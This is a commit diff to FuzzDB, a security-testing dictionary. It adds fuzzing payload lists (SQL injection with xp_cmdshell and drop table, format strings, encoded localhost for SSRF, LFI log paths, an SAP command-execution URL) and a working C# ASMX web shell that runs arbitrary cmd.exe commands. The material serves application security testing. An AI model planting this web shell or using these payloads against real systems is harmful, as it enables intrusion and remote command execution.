Merge branch 'master' into patch-9

This commit is contained in:
Adam Muntner 2019-10-15 15:26:43 -04:00 committed by GitHub
commit 77f572aa7c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
28 changed files with 71783 additions and 1367 deletions

1
.gitignore vendored Normal file
View file

@ -0,0 +1 @@
*.DS_Store

View file

@ -1,4 +1,8 @@
FuzzDB was created to increase the likelihood of causing and identifying conditions of security interest through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. _____________________________________
FYI: The /web-backdoors folder may trigger anti-virus scanners.
_____________________________________
FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses.
**Attack Patterns -** **Attack Patterns -**
FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing.
@ -64,20 +68,22 @@ Other security tools and projects that incorporate FuzzzDB in whole or part
**Preferred method is to check out sources via git, new payloads are added frequently** **Preferred method is to check out sources via git, new payloads are added frequently**
``` ```
git clone https://github.com/fuzzdb-project/fuzzdb.git git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1
``` ```
While in the FuzzDB dir, you can update your local repo with the command While in the FuzzDB dir, you can update your local repo with the command
``` ```
git pull git pull
``` ```
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip) This Stackoverflow gives ideas on how to keep your local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip)
Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system.
### Who ### ### Who ###
FuzzDB was created by Adam Muntner (amuntner @ gmail.com) FuzzDB was created by Adam Muntner (amuntner @ gmail.com)
FuzzDB (c) Copyright Adam Muntner, 2010-2017 FuzzDB (c) Copyright Adam Muntner, 2010-2019
Portions copyrighted by others, as noted in commit comments and README.md files. Portions copyrighted by others, as noted in commit comments and README.md files.
The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know. The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know.

View file

@ -1,4 +1,4 @@
Copyright (c) 2010-2017, Adam Muntner Copyright (c) 2010-2019, Adam Muntner
All rights reserved. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

View file

@ -0,0 +1,4 @@
php_magic_hashes.fuzz.txt - See, https://www.whitehatsec.com/blog/magic-hashes/
"the following “magic” strings are substantially more likely to evaluate to true when hashed given a completely random hash..."

View file

@ -0,0 +1,24 @@
00e00099
00e05651056780370631793326323796
00e1839085851394356611454660337505469745
00e2521569708250889666329543741175098562
00e38549671092424173928143648452
00e4706040169225543861400227305532507173
0e015339760548602306096794382326
0e01697014920826425936632356870426876167
0e074025
0e07766915004133176347055865026311692244
0e251331818775808475952406672980
0e266546927425668450445617970135
0e316321729023182394301371028665
0e34042599806027333661050958199580964722
0e462097431906509019562988736854
0e4868841162506296635201967091461310754872302741
0e495317064156922585933029613272
0e591528
0e684322
0e69173478833895223726165786906905141502
0e73845709713699
0e817678
0e908730200858058999593322639865
0e9108479697641294204710754930487725109982883677

View file

@ -54,3 +54,10 @@ u"\u0000"
%FE%80%80%80%80%80%80 %FE%80%80%80%80%80%80
<EFBFBD> <EFBFBD>
%2500
%252500
%25252500
%25%30%30
\x%30%30
%%30%30
%25%2530%2530

View file

@ -0,0 +1,9 @@
TRUE
true
1
-1
4294967295
0xFFFFFFFF
\FFFFFFFF
\FFFFFFFF\
\xFFFFFFFF

View file

@ -55,3 +55,13 @@ ppppp%x
ppppp%n ppppp%n
%@ %@
%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@
%*
%*p
%*x
%*s
%*S
%*$*
%*$*p
%*$*x
%*$*s
%*$*S

View file

@ -11,3 +11,12 @@
7F000001 7F000001
7F000002 7F000002
localhost localhost
0177.1
0177.2
0177.0.1
0177.0.2
017700000001
017700000002
0x7F000001
0x7F000002
0X07f.0.0.1

View file

@ -31,3 +31,22 @@
/var/log/error.log /var/log/error.log
/var/log/nginx/error.log /var/log/nginx/error.log
/var/log/nginx/access.log /var/log/nginx/access.log
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/bitnami/apache2/logs/access_log
/opt/bitnami/apache2/logs/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/apache2/error.log
/var/log/apache2/access.log
/var/log/httpd-error.log
/var/log/httpd-access.log

File diff suppressed because it is too large Load diff

View file

@ -29,13 +29,3 @@ benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))#
pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--

View file

@ -1,13 +1,9 @@
; --
'; --
'); --
'; exec master..xp_cmdshell 'ping 10.10.1.2'-- '; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
'exec sp_addlogin 'name' , 'password' --
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' grant connect to name; grant resource to name; -- ' grant connect to name; grant resource to name; --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) ' or 1=1 --
' or 1=1 --
' union (select @@version) -- ' union (select @@version) --
' union (select NULL, (select @@version)) -- ' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) --

View file

@ -1,5 +1,7 @@
< <
%3C %3C
%253C
%25253C
&lt &lt
&lt; &lt;
&LT &LT

View file

@ -0,0 +1,289 @@
aaa://
aaas://
about://
acap://
acct://
acr://
adiumxtra://
afp://
afs://
aim://
appdata://
apt://
attachment://
aw://
barion://
beshare://
bitcoin://
bitcoincash://
blob://
bolo://
browserext://
callto://
cap://
chrome://
chrome-extension://
cid://
coap://
coap+tcp://
coap+ws://
coaps://
coaps+tcp://
coaps+ws://
com-eventbrite-attendee://
content://
conti://
crid://
cvs://
data://
dav://
diaspora://
dict://
did://
dis://
dlna-playcontainer://
dlna-playsingle://
dns://
dntp://
dtn://
dvb://
ed2k://
elsi://
example://
facetime://
fax://
feed://
feedready://
file://
filesystem://
finger://
fish://
ftp://
geo://
gg://
git://
gizmoproject://
go://
gopher://
graph://
gtalk://
h323://
ham://
hcap://
hcp://
http://
https://
hxxp://
hxxps://
hydrazone://
iax://
icap://
icon://
im://
imap://
info://
iotdisco://
ipn://
ipp://
ipps://
irc://
irc6://
ircs://
iris://
iris.beep://
iris.lwz://
iris.xpc://
iris.xpcs://
isostore://
itms://
jabber://
jar://
jms://
keyparc://
lastfm://
ldap://
ldaps://
lvlt://
magnet://
mailserver://
mailto://
maps://
market://
message://
microsoft.windows.camera://
microsoft.windows.camera.multipicker://
microsoft.windows.camera.picker://
mid://
mms://
modem://
mongodb://
moz://
ms-access://
ms-browser-extension://
ms-drive-to://
ms-enrollment://
ms-excel://
ms-gamebarservices://
ms-gamingoverlay://
ms-getoffice://
ms-help://
ms-infopath://
ms-inputapp://
ms-lockscreencomponent-config://
ms-media-stream-id://
ms-mixedrealitycapture://
ms-officeapp://
ms-people://
ms-project://
ms-powerpoint://
ms-publisher://
ms-restoretabcompanion://
ms-screenclip://
ms-screensketch://
ms-search://
ms-search-repair://
ms-secondary-screen-controller://
ms-secondary-screen-setup://
ms-settings://
ms-settings-airplanemode://
ms-settings-bluetooth://
ms-settings-camera://
ms-settings-cellular://
ms-settings-cloudstorage://
ms-settings-connectabledevices://
ms-settings-displays-topology://
ms-settings-emailandaccounts://
ms-settings-language://
ms-settings-location://
ms-settings-lock://
ms-settings-nfctransactions://
ms-settings-notifications://
ms-settings-power://
ms-settings-privacy://
ms-settings-proximity://
ms-settings-screenrotation://
ms-settings-wifi://
ms-settings-workplace://
ms-spd://
ms-sttoverlay://
ms-transit-to://
ms-useractivityset://
ms-virtualtouchpad://
ms-visio://
ms-walk-to://
ms-whiteboard://
ms-whiteboard-cmd://
ms-word://
msnim://
msrp://
msrps://
mtqp://
mumble://
mupdate://
mvn://
news://
nfs://
ni://
nih://
nntp://
notes://
ocf://
oid://
onenote://
onenote-cmd://
opaquelocktoken://
openpgp4fpr://
pack://
palm://
paparazzi://
pkcs11://
platform://
pop://
pres://
prospero://
proxy://
pwid://
psyc://
qb://
query://
redis://
rediss://
reload://
res://
resource://
rmi://
rsync://
rtmfp://
rtmp://
rtsp://
rtsps://
rtspu://
secondlife://
service://
session://
sftp://
sgn://
shttp://
sieve://
simpleledger://
sip://
sips://
skype://
smb://
sms://
smtp://
snews://
snmp://
soap.beep://
soap.beeps://
soldat://
spiffe://
spotify://
ssh://
steam://
stun://
stuns://
submit://
svn://
tag://
teamspeak://
tel://
teliaeid://
telnet://
tftp://
things://
thismessage://
tip://
tn3270://
tool://
turn://
turns://
tv://
udp://
unreal://
urn://
ut2004://
v-event://
vemmi://
ventrilo://
videotex://
vnc://
view-source://
wais://
webcal://
wpid://
ws://
wss://
wtai://
wyciwyg://
xcon://
xcon-userid://
xfire://
xmlrpc.beep://
xmlrpc.beeps://
xmpp://
xri://
ymsgr://
z39.50://
z39.50r://
z39.50s://

View file

@ -0,0 +1,48 @@
# this list can be used to enumerate supported Web Socket sub protocols of a web socket server
# It conyains the official IANA registerd Web Socket sub protocols
# Source: https://www.iana.org/assignments/websocket/websocket.xml
# Example subprotocol request header:
# Sec-WebSocket-Protocol: mqtt, wamp
# The Web Socket client can include a list of the protocols when making the initial HTTP request.
# The server is then required to either select one of those protocols and include it in a response header.
# If none of the sub protocols send by the client are supported by the server,
# the server shoud fail the handshake and terminate the connection.
MBWS.huawei.com
MBLWS.huawei.com
soap
wamp
v10.stomp
v11.stomp
v12.stomp
ocpp1.2
ocpp1.5
ocpp1.6
ocpp2.0
rfb
sip
notificationchannel-netapi-rest.openmobilealliance.org
wpcp
amqp
mqtt
jsflow
rwpcp
xmpp
ship
mielecloudconnect
v10.pcp.sap.com
msrp
v1.saltyrtc.org
TLCP-2.0.0.lightstreamer.com
bfcp
sldp.softvelum.com
opcua+uacp
opcua+uajson
v1.swindon-lattice+json
v1.usp
mles-websocket
coap
TLCP-2.1.0.lightstreamer.com
sqlnet.oracle.com
oneM2M.R2.0.json
oneM2M.R2.0.xml
oneM2M.R2.0.cbor

View file

@ -0,0 +1,101 @@
account
accounts
active
activity
apikey
balance
block
blocks
calendar
category
change
check
close
coins
company
create
crypto
current
deposits
domain
domain
event
events
export
favorite
feature
file
fills
forecast
funding
glass
global
heartbeat
history
holds
holiday
hosts
in
indicators
ingredient
ipv4
ipv6
latestblock
ledger
list
lookup
malware
matches
messages
multiaddress
nids
orders
out
payment
phishing
position
price
product
products
profile
profiles
pulses
query
rate
rawblock
recipe
related
repay
report
rescan
scan
scan
search
section
self
send
spam
status
style
subscribed
suggest
threats
ticker
time
today
tomorrow
transaction
try
tx
type
types
url
user
users
validate
verify
version
version
volume
withdrawals
yesterday

View file

@ -1,3 +1,6 @@
한국
ไทย
ଭାରତ
ac ac
ad ad
ae ae
@ -49,6 +52,7 @@ cl
cm cm
cn cn
co co
country
cr cr
cu cu
cv cv
@ -56,7 +60,6 @@ cw
cx cx
cy cy
cz cz
dd
de de
dj dj
dk dk
@ -251,7 +254,60 @@ wf
ws ws
ye ye
yt yt
yu
za za
zm zm
zw zw
ایران‎
ڀارت‎
الاردن‎
الجزائر‎
السعودية‎
المغرب‎
امارات‎
بھارت‎
بارت‎
پاکستان‎
تونس‎
سودان‎
سورية‎
عراق‎
عمان‎
فلسطين‎
قطر‎
مصر‎
مليسيا‎
موريتانيا‎
ελ
бг
бел
ею
қаз
мкд
мон
рф
срб
укр
հայ
გე
भारत
भारतम्
भारोत
ભારત
భారత్
ਭਾਰਤ
ಭಾರತ
இந்தியா
இலங்கை
சிங்கப்பூர்
ഭാരതം
বাংলা
ভারত
ভাৰত
ලංකා
中国
中國
台湾
台灣
新加坡
澳門
香港

File diff suppressed because it is too large Load diff

View file

@ -47,5 +47,6 @@
/.htpasswd /.htpasswd
/.nsconfig /.nsconfig
/.passwd /.passwd
/.viminfo
/.www_acl /.www_acl
/.wwwacl /.wwwacl

File diff suppressed because it is too large Load diff

View file

@ -6,8 +6,9 @@ bak
sav sav
~ ~
copy copy
old
orig orig
tmp tmp
txt txt
back back
swp
rej

View file

@ -161,7 +161,9 @@ dm2
dmo dmo
dmsk dmsk
dnc dnc
doc
dockzip dockzip
docx
dp1 dp1
dpn dpn
dpx dpx

View file

@ -16,6 +16,7 @@ admin/adminLogin.html
admin/adminLogin.htm admin/adminLogin.htm
admin/admin_login.html admin/admin_login.html
admin/controlpanel.html admin/controlpanel.html
admin/index.html
admin/admin-login.html admin/admin-login.html
admin-login.html admin-login.html
admin/account.html admin/account.html

View file

@ -1,5 +1,6 @@
/@download@ /@download@
/AdapterFramework/version/version.jsp /AdapterFramework/version/version.jsp
/AdminTools
/AdminTools/ /AdminTools/
/Adobe /Adobe
/AdobeDocumentServices/Config /AdobeDocumentServices/Config
@ -27,24 +28,29 @@
/bcb/bcbadmSystemInfo.jsp /bcb/bcbadmSystemInfo.jsp
/bcbtest/start.jsp /bcbtest/start.jsp
/BI_UDC /BI_UDC
/BizcCommLayerAuthoring/Config?wsdl
/BizcCommLayerAuthoring/Config1 /BizcCommLayerAuthoring/Config1
/BizcCommLayerAuthoring/Config1?wsdl /BizcCommLayerAuthoring/Config1?wsdl
/BizcCommLayerAuthoring/Config?wsdl
/BOE
/BusinessProcessBI
/bwtest /bwtest
/caf /caf
/CAFDataService/Config /CAFDataService/Config
/CAFDataService/Config?wsdl /CAFDataService/Config?wsdl
/ccsui /ccsui
/clientapi
/CmcApp/logon.faces /CmcApp/logon.faces
/CMSRTS/Config?wsdl /CMCDoc
/CMSRTS/Config1 /CMSRTS/Config1
/CMSRTS/Config1?wsdl /CMSRTS/Config1?wsdl
/CMSRTS/Config?wsdl
/com~tc~lm~webadmin~httpprovider~web /com~tc~lm~webadmin~httpprovider~web
/CrystalReports/viewrpt.cwr /CrystalReports/viewrpt.cwr
/ctc /ctc
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
/DataArchivingService /DataArchivingService
/dispatcher /dispatcher
/docs
/dswsbobje /dswsbobje
/dswsbobje/services/BICatalog?wsdl /dswsbobje/services/BICatalog?wsdl
/dswsbobje/services/listServices /dswsbobje/services/listServices
@ -56,6 +62,7 @@
/GRMGWSTest/service /GRMGWSTest/service
/GRMGWSTest/service?wsdl /GRMGWSTest/service?wsdl
/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a /guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
/host-manager
/htmlb/ /htmlb/
/htmlb/docs/api/index.html /htmlb/docs/api/index.html
/htmlb/index.html /htmlb/index.html
@ -120,9 +127,12 @@
/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet /logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp /logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
/main.html /main.html
/manager
/meSync/HttpGRMGTest.html /meSync/HttpGRMGTest.html
/mmr/ /mmr/
/mmr/mmr/MMRUI.html /mmr/mmr/MMRUI.html
/MobileBIService
/MOBIServer
/Modeler /Modeler
/modeller/ /modeller/
/modeller/index.html /modeller/index.html
@ -139,6 +149,7 @@
/rep/build_info.html /rep/build_info.html
/rep/build_info.jsp /rep/build_info.jsp
/rep/start/index.jsp /rep/start/index.jsp
/ROOT
/run/build_info.html /run/build_info.html
/run/build_info.jsp /run/build_info.jsp
/rwb/version.html /rwb/version.html
@ -438,9 +449,9 @@
/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
/webdynpro/resources/sap.com/ /webdynpro/resources/sap.com/
/webdynpro/welcome/Welcome.jsp /webdynpro/welcome/Welcome.jsp
/WSConnector/Config?wsdl
/WSConnector/Config1 /WSConnector/Config1
/WSConnector/Config1?wsdl /WSConnector/Config1?wsdl
/WSConnector/Config?wsdl
/wsd2wsdl /wsd2wsdl
/wsnavigator /wsnavigator
/wsnavigator/jsps/index.jsp /wsnavigator/jsps/index.jsp

View file

@ -0,0 +1,88 @@
<%--
Usage:
POST /test.asmx HTTP/1.1
Host: example.com
Content-Type: text/xml; charset=utf-8
Content-Length: 363
SOAPAction: "http://tempuri.org/Test"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Test xmlns="http://tempuri.org/">
<Z1>cmd.exe</Z1>
<Z2>/c net user</Z2>
</Test>
</soap:Body>
</soap:Envelope>
--%>
<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Data;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web.SessionState;
using System.Web.Services;
using System.Xml;
using System.Web.Services.Protocols;
[WebService(Namespace = "http://www.payloads.online/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class New_Process :Process
{
public New_Process(string s)
{
}
}
public class Service : System.Web.Services.WebService
{
public Service()
{
}
[WebMethod]
public string Test(string Z1,string Z2)
{
String R;
ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
Process e = new New_Process("something");
StreamReader OT, ER;
c.UseShellExecute = false;
c.RedirectStandardOutput = true;
c.RedirectStandardError = true;
e.StartInfo = c;
e.Start();
OT = e.StandardOutput;
ER = e.StandardError;
e.Close();
R = OT.ReadToEnd() + ER.ReadToEnd();
HttpContext.Current.Response.Clear();
HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
HttpContext.Current.Response.Write("<data>");
HttpContext.Current.Response.Write("<![CDATA[");
HttpContext.Current.Response.Write("\x2D\x3E\x7C");
HttpContext.Current.Response.Write(R);
HttpContext.Current.Response.Write("\x7C\x3C\x2D");
HttpContext.Current.Response.Write("]]>");
HttpContext.Current.Response.Write("</data>");
HttpContext.Current.Response.End();
return R;
}
}

View file

@ -0,0 +1,986 @@
103.20.188.35
103.20.188.83
103.22.248.62
103.3.46.105
106.186.17.181
106.51.255.133
109.69.8.34
109.69.8.51
110.170.117.15
110.76.151.17
114.114.114.114
114.114.114.119
114.114.115.115
114.114.115.119
115.68.100.102
115.68.100.103
115.68.62.210
115.68.62.222
115.85.69.162
117.102.224.154
117.102.224.230
119.160.208.251
119.160.208.252
119.18.159.222
119.252.167.229
121.152.231.196
121.194.2.2
12.127.16.67
12.127.17.72
121.52.206.130
121.52.87.128
122.0.0.12
122.155.12.41
122.155.167.38
122.155.167.70
122.155.3.119
122.210.229.161
122.255.96.132
124.107.135.126
1.2.4.8
128.199.248.105
129.250.35.250
129.250.35.251
129.7.1.1
129.7.1.6
130.180.228.2
131.155.140.130
131.191.7.12
134.48.1.32
134.60.1.111
137.82.1.1
139.0.27.186
139.130.4.4
139.175.55.244
141.1.1.1
141.1.27.249
141.211.125.15
141.211.125.17
141.211.144.15
141.211.144.17
142.103.1.1
142.46.1.130
142.46.128.130
144.76.202.253
147.235.250.2
147.235.251.3
147.29.10.55
147.29.10.6
148.233.151.6
148.233.151.8
148.243.65.17
149.156.64.210
149.211.153.50
151.11.85.5
152.99.1.10
152.99.200.6
152.99.78.136
153.19.1.254
158.43.128.1
158.43.128.72
158.43.192.1
158.43.240.3
158.43.240.4
159.90.200.7
160.7.240.20
164.124.101.2
164.124.107.9
165.166.142.42
165.21.100.88
165.21.83.88
165.87.13.129
165.87.201.244
168.126.63.1
168.188.1.1
168.213.3.10
168.213.3.11
168.215.165.186
168.215.210.50
168.95.1.1
170.51.255.100
170.56.58.53
173.44.32.2
174.34.129.34
178.151.86.169
178.161.146.10
178.254.21.113
180.211.129.42
185.46.7.100
185.46.7.110
187.115.52.83
187.73.241.67
189.90.16.20
190.11.32.199
192.116.16.26
192.172.250.8
192.190.173.40
192.43.161.22
192.76.144.66
193.101.111.10
193.111.144.145
193.111.144.161
193.111.200.191
193.111.238.5
193.138.78.117
193.142.218.3
193.148.29.100
193.148.29.103
193.151.32.40
193.16.255.2
193.17.213.10
193.189.114.254
193.200.68.230
193.201.185.3
193.205.136.1
193.22.119.195
193.226.128.129
193.226.61.1
193.228.86.5
193.230.161.3
193.230.161.4
193.230.183.201
193.230.230.1
193.231.112.1
193.231.249.1
193.231.80.7
193.232.69.22
193.252.247.52
193.252.247.53
193.254.232.1
193.255.146.53
193.26.6.130
193.27.192.98
193.33.114.2
193.33.220.3
193.33.236.1
193.41.10.1
193.41.59.151
193.43.108.3
193.43.108.62
193.43.17.4
193.58.204.59
193.58.251.251
193.67.79.39
193.78.240.12
193.86.86.2
193.89.221.124
193.89.221.2
193.89.248.1
193.95.93.243
193.95.93.77
194.102.106.1
194.113.160.68
194.1.154.37
194.117.245.2
194.12.224.34
194.126.130.7
194.132.119.151
194.132.32.32
194.141.12.1
194.141.45.4
194.145.147.194
194.145.240.6
194.146.136.1
194.149.133.11
194.149.146.2
194.149.156.140
194.150.168.168
194.153.232.17
194.158.206.205
194.158.206.206
194.164.181.2
194.169.239.10
194.169.244.33
194.169.244.34
194.172.160.4
194.179.109.10
194.179.1.100
194.18.231.5
194.187.164.20
194.190.225.2
194.20.0.24
194.213.193.5
194.226.211.11
194.246.126.68
194.246.127.11
194.250.223.1
194.250.223.2
194.25.0.52
194.25.0.60
194.39.185.10
194.50.10.2
194.52.202.98
194.54.181.90
194.6.240.1
194.72.9.61
194.75.147.212
194.77.8.1
194.88.202.11
194.88.203.6
194.98.65.165
195.112.96.34
195.113.144.194
195.114.173.153
195.12.4.247
195.129.12.114
195.129.12.122
195.129.12.83
195.13.38.3
195.137.162.149
195.140.236.250
195.140.236.253
195.14.50.21
195.146.81.130
195.153.19.10
195.153.19.5
195.158.239.4
195.167.98.3
195.170.96.2
195.170.97.254
195.175.121.10
195.175.39.39
195.175.39.40
195.177.223.3
195.177.240.3
195.178.123.130
195.182.110.132
195.182.192.10
195.182.192.2
195.186.1.110
195.186.1.111
195.186.4.110
195.186.4.111
195.189.130.1
195.189.131.1
195.198.214.72
195.20.193.11
195.2.195.1
195.22.192.252
195.24.228.3
195.243.214.4
195.244.25.3
195.245.76.6
195.27.1.1
195.35.110.4
195.5.125.3
195.60.70.5
195.67.15.102
195.67.15.73
195.67.160.3
195.67.27.18
195.69.65.98
195.70.237.42
195.70.248.1
195.74.128.6
195.7.64.3
195.88.84.100
195.96.208.1
195.99.66.220
196.41.225.11
198.60.22.2
198.82.247.34
199.249.18.1
199.249.19.2
199.44.194.2
199.80.64.202
200.113.185.227
200.118.2.88
200.175.3.232
200.221.11.100
200.221.11.101
200.221.137.40
200.221.137.41
200.221.137.42
200.221.137.43
200.221.137.44
200.221.137.45
200.221.137.46
200.221.137.47
200.35.174.126
200.40.230.36
200.49.160.31
200.49.160.35
200.53.250.1
200.56.224.11
200.57.2.108
200.57.7.61
200.69.193.2
200.85.0.105
200.85.35.158
200.85.61.90
200.88.127.22
200.88.127.23
200.95.144.3
201.131.4.5
201.131.4.9
202.120.111.3
202.130.97.65
202.130.97.66
202.136.162.11
202.138.120.4
202.138.120.6
202.138.120.87
202.148.202.3
202.148.202.4
202.152.162.66
202.180.160.1
202.181.224.2
202.199.160.206
202.248.20.133
202.248.37.74
202.28.162.1
202.30.143.11
202.38.128.58
202.43.178.244
202.43.178.245
202.44.204.63
202.44.55.193
202.46.1.2
202.51.96.5
202.62.224.2
202.83.20.101
202.83.30.5
202.86.8.100
202.91.8.234
203.109.129.67
203.109.129.68
203.113.11.37
203.115.130.74
203.115.71.66
203.115.81.38
203.119.36.106
203.119.8.106
203.130.2.3
203.133.1.7
203.133.1.8
203.146.237.222
203.146.237.237
203.156.104.21
203.176.144.12
203.176.144.20
203.189.88.10
203.189.88.11
203.189.88.133
203.189.88.148
203.189.88.151
203.189.88.152
203.189.88.154
203.189.88.156
203.189.88.211
203.189.88.212
203.189.88.213
203.189.88.214
203.189.88.54
203.189.89.1
203.189.89.134
203.189.89.15
203.189.89.209
203.189.89.241
203.189.89.36
203.189.89.65
203.193.139.150
203.196.0.6
203.198.7.66
203.2.193.67
203.239.131.1
203.248.252.2
203.250.129.214
203.253.31.1
203.41.44.20
203.63.8.27
203.80.96.10
203.89.226.24
203.89.226.26
203.90.78.65
204.116.57.2
204.117.214.10
204.174.120.45
204.95.160.2
205.134.162.209
205.151.222.250
205.152.6.20
205.171.2.65
205.172.19.193
205.172.19.79
205.236.148.130
205.236.148.131
205.242.187.234
206.124.0.254
206.124.1.254
206.124.64.1
206.124.64.253
206.248.95.194
206.253.194.65
206.253.33.130
206.253.33.131
206.51.143.55
206.80.254.4
206.80.254.68
207.17.190.5
207.17.190.7
207.179.3.25
207.241.160.34
207.248.224.71
207.248.224.72
207.248.57.10
207.249.163.155
207.91.130.4
207.91.250.34
208.116.30.21
208.38.1.15
208.48.253.106
208.59.89.20
208.67.220.220
208.67.220.222
208.67.222.220
208.67.222.222
208.72.120.204
208.78.24.238
208.79.56.204
208.90.237.9
209.0.205.11
209.143.0.10
209.143.22.182
209.172.128.2
209.191.129.65
209.195.95.95
209.197.128.2
209.213.223.18
209.216.160.131
209.216.160.2
209.252.33.101
209.51.161.14
209.51.161.58
209.55.0.110
209.55.1.220
209.63.0.18
209.87.64.70
209.87.79.232
210.180.98.69
210.220.163.82
210.2.4.8
210.29.96.33
210.34.0.18
210.34.48.34
210.44.112.66
210.80.58.3
210.80.58.66
210.94.0.7
211.115.194.2
211.115.194.3
211.161.46.84
211.172.208.2
211.175.82.66
211.237.65.21
211.237.65.31
211.41.128.70
211.41.128.71
211.60.155.5
211.63.64.11
211.67.112.1
211.78.130.10
211.78.130.11
211.78.130.3
212.102.225.2
212.110.122.132
212.1.118.3
212.112.39.22
212.112.39.25
212.116.76.76
212.118.0.2
212.118.241.1
212.118.241.33
212.122.224.10
212.14.253.242
212.15.86.12
212.181.124.8
212.19.149.226
212.192.128.3
212.19.96.2
212.203.32.11
212.203.33.12
212.211.132.4
212.214.229.170
212.216.172.222
212.230.255.1
212.230.255.129
212.236.250.4
212.245.158.66
212.26.6.11
212.28.34.90
212.30.96.211
212.31.253.69
212.31.32.130
212.31.32.131
212.34.194.211
212.36.24.3
212.37.208.3
212.40.0.10
212.40.5.50
212.40.5.51
212.49.128.65
212.51.16.1
212.51.17.1
212.54.160.7
212.57.190.166
212.58.3.2
212.58.3.7
212.58.3.8
212.59.199.2
212.59.199.6
212.62.98.10
212.66.0.1
212.66.1.1
212.66.129.98
212.66.160.2
212.67.131.4
212.73.209.34
212.73.65.40
212.82.225.7
212.82.226.212
212.85.112.32
212.85.32.3
212.89.130.180
212.9.160.1
212.94.162.33
212.94.32.32
212.94.34.34
212.96.1.70
212.97.32.2
212.98.160.50
212.98.160.65
213.0.76.5
213.0.77.5
213.0.77.8
